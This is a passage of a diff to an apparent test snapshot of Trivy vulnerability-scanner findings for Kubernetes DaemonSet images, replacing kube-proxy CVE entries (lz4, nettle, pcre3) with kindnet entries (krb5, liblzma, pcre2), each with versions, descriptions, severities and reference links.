crafted file to an application linked with lz4 may be able to trigger an integer overflow, leading to calling of memmove() on a negative size argument, causing an out-of-bounds write and/or a crash. The greatest impact of this flaw is to availability, with some potential impact to confidentiality and integrity as well.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "memory corruption due to an integer overflow bug caused by memmove argument", + "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3520", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3520", + "value": "https://avd.aquasec.com/nvd/cve-2018-5709", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1954559", + "value": "https://access.redhat.com/security/cve/CVE-2018-5709", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3520", + "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-2575.html", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:2575", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", }, { "type": "URL", - "value": "https://github.com/lz4/lz4/pull/972", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "1.18.3-6+deb11u3", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-42898", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libkrb5support0", + "references": [ + "https://access.redhat.com/errata/RHSA-2022:8637", + "https://access.redhat.com/security/cve/CVE-2022-42898", + "https://bugzilla.redhat.com/2140960", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "https://errata.rockylinux.org/RLSA-2022:8637", + "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "https://linux.oracle.com/cve/CVE-2022-42898.html", + "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "https://security.netapp.com/advisory/ntap-20230216-0008/", + "https://security.netapp.com/advisory/ntap-20230223-0001/", + "https://ubuntu.com/security/notices/USN-5800-1", + "https://ubuntu.com/security/notices/USN-5822-1", + "https://ubuntu.com/security/notices/USN-5822-2", + "https://ubuntu.com/security/notices/USN-5828-1", + "https://ubuntu.com/security/notices/USN-5936-1", + "https://web.mit.edu/kerberos/advisories/", + "https://web.mit.edu/kerberos/krb5-1.19/", + "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "https://www.samba.org/samba/security/CVE-2022-42898.html", + ], + }, + "category": "Vulnerability", + "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "integer overflow vulnerabilities in PAC parsing", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3520.html", + "value": "https://avd.aquasec.com/nvd/cve-2022-42898", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-2575.html", + "value": "https://access.redhat.com/errata/RHSA-2022:8637", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3520", + "value": "https://access.redhat.com/security/cve/CVE-2022-42898", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211104-0005/", + "value": "https://bugzilla.redhat.com/2140960", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4968-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4968-2", + "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3520", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", }, { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://errata.rockylinux.org/RLSA-2022:8637", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-17543", - "installedVersion": "1.8.3-1", - "packageName": "liblz4-1", - "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00069.html", - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00070.html", - "https://access.redhat.com/security/cve/CVE-2019-17543", - "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=15941", - "https://github.com/lz4/lz4/compare/v1.9.1...v1.9.2", - "https://github.com/lz4/lz4/issues/801", - "https://github.com/lz4/lz4/pull/756", - "https://github.com/lz4/lz4/pull/760", - "https://lists.apache.org/thread.html/25015588b770d67470b7ba7ea49a305d6735dd7f00eabe7d50ec1e17@%3Cissues.arrow.apache.org%3E", - "https://lists.apache.org/thread.html/543302d55e2d2da4311994e9b0debdc676bf3fd05e1a2be3407aa2d6@%3Cissues.arrow.apache.org%3E", - "https://lists.apache.org/thread.html/793012683dc0fa6819b7c2560e6cf990811014c40c7d75412099c357@%3Cissues.arrow.apache.org%3E", - "https://lists.apache.org/thread.html/9ff0606d16be2ab6a81619e1c9e23c3e251756638e36272c8c8b7fa3@%3Cissues.arrow.apache.org%3E", - "https://lists.apache.org/thread.html/f0038c4fab2ee25aee849ebeff6b33b3aa89e07ccfb06b5c87b36316@%3Cissues.arrow.apache.org%3E", - "https://lists.apache.org/thread.html/f506bc371d4a068d5d84d7361293568f61167d3a1c3e91f0def2d7d3@%3Cdev.arrow.apache.org%3E", - "https://lists.apache.org/thread.html/r0fb226357e7988a241b06b93bab065bcea2eb38658b382e485960e26@%3Cissues.kudu.apache.org%3E", - "https://lists.apache.org/thread.html/r4068ba81066792f2b4d208b39c4c4713c5d4c79bd8cb6c1904af5720@%3Cissues.kudu.apache.org%3E", - "https://lists.apache.org/thread.html/r7bc72200f94298bc9a0e35637f388deb53467ca4b2e2ad1ff66d8960@%3Cissues.kudu.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2019-17543", - "https://security.netapp.com/advisory/ntap-20210723-0001/", - "https://www.cve.org/CVERecord?id=CVE-2019-17543", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuoct2020.html", - ], - }, - "category": "Vulnerability", - "description": "LZ4 before 1.9.2 has a heap-based buffer overflow in LZ4_write32 (related to LZ4_compress_destSize), affecting applications that call LZ4_compress_fast with a large input. (This issue can also lead to data corruption.) NOTE: the vendor states "only a few specific / uncommon usages of the API are at risk."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "lz4: heap-based buffer overflow in LZ4_write32", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-17543", + "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00069.html", + "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00070.html", + "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-17543", + "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=15941", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", }, { "type": "URL", - "value": "https://github.com/lz4/lz4/compare/v1.9.1...v1.9.2", + "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", }, { "type": "URL", - "value": "https://github.com/lz4/lz4/issues/801", + "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", }, { "type": "URL", - "value": "https://github.com/lz4/lz4/pull/756", + "value": "https://ubuntu.com/security/notices/USN-5800-1", }, { "type": "URL", - "value": "https://github.com/lz4/lz4/pull/760", + "value": "https://ubuntu.com/security/notices/USN-5822-1", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/25015588b770d67470b7ba7ea49a305d6735dd7f00eabe7d50ec1e17@%3Cissues.arrow.apache.org%3E", + "value": "https://ubuntu.com/security/notices/USN-5822-2", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/543302d55e2d2da4311994e9b0debdc676bf3fd05e1a2be3407aa2d6@%3Cissues.arrow.apache.org%3E", + "value": "https://ubuntu.com/security/notices/USN-5828-1", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/793012683dc0fa6819b7c2560e6cf990811014c40c7d75412099c357@%3Cissues.arrow.apache.org%3E", + "value": "https://ubuntu.com/security/notices/USN-5936-1", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/9ff0606d16be2ab6a81619e1c9e23c3e251756638e36272c8c8b7fa3@%3Cissues.arrow.apache.org%3E", + "value": "https://web.mit.edu/kerberos/advisories/", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/f0038c4fab2ee25aee849ebeff6b33b3aa89e07ccfb06b5c87b36316@%3Cissues.arrow.apache.org%3E", + "value": "https://web.mit.edu/kerberos/krb5-1.19/", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/f506bc371d4a068d5d84d7361293568f61167d3a1c3e91f0def2d7d3@%3Cdev.arrow.apache.org%3E", + "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r0fb226357e7988a241b06b93bab065bcea2eb38658b382e485960e26@%3Cissues.kudu.apache.org%3E", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r4068ba81066792f2b4d208b39c4c4713c5d4c79bd8cb6c1904af5720@%3Cissues.kudu.apache.org%3E", + "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-5709", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libkrb5support0", + "references": [ + "https://access.redhat.com/security/cve/CVE-2018-5709", + "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "https://www.cve.org/CVERecord?id=CVE-2018-5709", + ], + }, + "category": "Vulnerability", + "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", + "references": [ { "type": "URL", - "value": "https://lists.apache.org/thread.html/r7bc72200f94298bc9a0e35637f388deb53467ca4b2e2ad1ff66d8960@%3Cissues.kudu.apache.org%3E", + "value": "https://avd.aquasec.com/nvd/cve-2018-5709", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-17543", + "value": "https://access.redhat.com/security/cve/CVE-2018-5709", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210723-0001/", + "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-17543", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2020.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "5.2.4-1+deb10u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "fixedVersion": "5.2.5-2.1~deb11u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2022-1271", - "installedVersion": "5.2.4-1", + "installedVersion": "5.2.5-2", "packageName": "liblzma5", "references": [ "https://access.redhat.com/errata/RHSA-2022:4940", @@ -160694,7 +161208,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "An arbitrary file write vulnerability was found in GNU gzip's zgrep utility. When zgrep is applied on the attacker's chosen file name (for example, a crafted file name), this can overwrite an attacker's content to an arbitrary attacker-selected file. This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names. This flaw allows a remote, low privileged attacker to force zgrep to write arbitrary files on the system.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "arbitrary-file-write vulnerability", "references": [ @@ -160795,359 +161309,246 @@ and the severity is therefore considered low.", }, { "attributes": { - "fixedVersion": "3.4.1-1+deb10u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-20305", - "installedVersion": "3.4.1-1", - "packageName": "libnettle6", + "fixedVersion": "10.36-2+deb11u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1586", + "installedVersion": "10.36-2", + "packageName": "libpcre2-8-0", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-20305", - "https://bugzilla.redhat.com/show_bug.cgi?id=1942533", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20305", - "https://linux.oracle.com/cve/CVE-2021-20305.html", - "https://linux.oracle.com/errata/ELSA-2021-1206.html", - "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQKWVVMAIDAJ7YAA3VVO32BHLDOH2E63/", - "https://lists.lysator.liu.se/pipermail/nettle-bugs/2021/009457.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-20305", - "https://security.gentoo.org/glsa/202105-31", - "https://security.netapp.com/advisory/ntap-20211022-0002/", - "https://ubuntu.com/security/notices/USN-4906-1", - "https://www.cve.org/CVERecord?id=CVE-2021-20305", - "https://www.debian.org/security/2021/dsa-4933", + "https://access.redhat.com/errata/RHSA-2022:5809", + "https://access.redhat.com/security/cve/CVE-2022-1586", + "https://bugzilla.redhat.com/2077976", + "https://bugzilla.redhat.com/show_bug.cgi?id=2077976", + "https://bugzilla.redhat.com/show_bug.cgi?id=2077976,", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1586", + "https://errata.almalinux.org/8/ALSA-2022-5809.html", + "https://errata.rockylinux.org/RLSA-2022:5809", + "https://github.com/PCRE2Project/pcre2/commit/50a51cb7e67268e6ad417eb07c9de9bfea5cc55a,", + "https://github.com/PCRE2Project/pcre2/commit/d4fa336fbcc388f89095b184ba6d99422cfc676c", + "https://linux.oracle.com/cve/CVE-2022-1586.html", + "https://linux.oracle.com/errata/ELSA-2022-5809.html", + "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1586", + "https://security.netapp.com/advisory/ntap-20221028-0009/", + "https://ubuntu.com/security/notices/USN-5627-1", + "https://ubuntu.com/security/notices/USN-5627-2", + "https://www.cve.org/CVERecord?id=CVE-2022-1586", ], }, "category": "Vulnerability", - "description": "A flaw was found in Nettle in versions before 3.7.2, where several Nettle signature verification functions (GOST DSA, EDDSA & ECDSA) result in the Elliptic Curve Cryptography point (ECC) multiply function being called with out-of-range scalers, possibly resulting in incorrect results. This flaw allows an attacker to force an invalid signature, causing an assertion failure or possible validation. The highest threat to this vulnerability is to confidentiality, integrity, as well as system availability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "An out-of-bounds read vulnerability was discovered in the PCRE2 library in the compile_xclass_matchingpath() function of the pcre2_jit_compile.c file. This involves a unicode property matching issue in JIT-compiled regular expressions. The issue occurs because the character was not fully read in case-less matching within JIT.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "nettle: Out of bounds memory access in signature verification", + "name": "pcre2: Out-of-bounds read in compile_xclass_matchingpath in pcre2_jit_compile.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-20305", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-20305", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1942533", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20305", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-20305.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-1206.html", - }, - { - "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", - }, - { - "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQKWVVMAIDAJ7YAA3VVO32BHLDOH2E63/", - }, - { - "type": "URL", - "value": "https://lists.lysator.liu.se/pipermail/nettle-bugs/2021/009457.html", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-20305", - }, - { - "type": "URL", - "value": "https://security.gentoo.org/glsa/202105-31", - }, - { - "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211022-0002/", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4906-1", - }, - { - "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-20305", + "value": "https://avd.aquasec.com/nvd/cve-2022-1586", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4933", + "value": "https://access.redhat.com/errata/RHSA-2022:5809", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "3.4.1-1+deb10u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3580", - "installedVersion": "3.4.1-1", - "packageName": "libnettle6", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-3580", - "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", - "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", - "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", - "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", - "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", - "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", - "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", - "https://errata.almalinux.org/8/ALSA-2021-4451.html", - "https://errata.rockylinux.org/RLSA-2021:4451", - "https://linux.oracle.com/cve/CVE-2021-3580.html", - "https://linux.oracle.com/errata/ELSA-2022-9221.html", - "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3580", - "https://security.netapp.com/advisory/ntap-20211104-0006/", - "https://ubuntu.com/security/notices/USN-4990-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3580", - ], - }, - "category": "Vulnerability", - "description": "A flaw was found in the way nettle's RSA decryption functions handled specially crafted ciphertext. An attacker could use this flaw to provide a manipulated ciphertext leading to application crash and denial of service.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "nettle: Remote crash in RSA decryption via manipulated ciphertext", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3580", + "value": "https://access.redhat.com/security/cve/CVE-2022-1586", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3580", + "value": "https://bugzilla.redhat.com/2077976", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077976", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077976,", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1586", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", + "value": "https://errata.almalinux.org/8/ALSA-2022-5809.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", + "value": "https://errata.rockylinux.org/RLSA-2022:5809", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", + "value": "https://github.com/PCRE2Project/pcre2/commit/50a51cb7e67268e6ad417eb07c9de9bfea5cc55a,", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", + "value": "https://github.com/PCRE2Project/pcre2/commit/d4fa336fbcc388f89095b184ba6d99422cfc676c", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", + "value": "https://linux.oracle.com/cve/CVE-2022-1586.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", + "value": "https://linux.oracle.com/errata/ELSA-2022-5809.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", + "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4451.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4451", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3580.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9221.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1586", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3580", + "value": "https://security.netapp.com/advisory/ntap-20221028-0009/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211104-0006/", + "value": "https://ubuntu.com/security/notices/USN-5627-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4990-1", + "value": "https://ubuntu.com/security/notices/USN-5627-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3580", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1586", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-14155", - "installedVersion": "2:8.39-12", - "packageName": "libpcre3", + "fixedVersion": "10.36-2+deb11u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1587", + "installedVersion": "10.36-2", + "packageName": "libpcre2-8-0", "references": [ - "http://seclists.org/fulldisclosure/2020/Dec/32", - "http://seclists.org/fulldisclosure/2021/Feb/14", - "https://about.gitlab.com/releases/2020/07/01/security-release-13-1-2-release/", - "https://access.redhat.com/security/cve/CVE-2020-14155", - "https://bugs.gentoo.org/717920", - "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", - "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", - "https://errata.almalinux.org/8/ALSA-2021-4373.html", - "https://errata.rockylinux.org/RLSA-2021:4373", - "https://linux.oracle.com/cve/CVE-2020-14155.html", - "https://linux.oracle.com/errata/ELSA-2021-4373.html", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2020-14155", - "https://security.netapp.com/advisory/ntap-20221028-0010/", - "https://support.apple.com/kb/HT211931", - "https://support.apple.com/kb/HT212147", - "https://ubuntu.com/security/notices/USN-5425-1", - "https://www.cve.org/CVERecord?id=CVE-2020-14155", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.pcre.org/original/changelog.txt", + "https://access.redhat.com/security/cve/CVE-2022-1587", + "https://bugzilla.redhat.com/show_bug.cgi?id=2077983,", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1587", + "https://github.com/PCRE2Project/pcre2/commit/03654e751e7f0700693526b67dfcadda6b42c9d0", + "https://linux.oracle.com/cve/CVE-2022-1587.html", + "https://linux.oracle.com/errata/ELSA-2022-5251.html", + "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", + 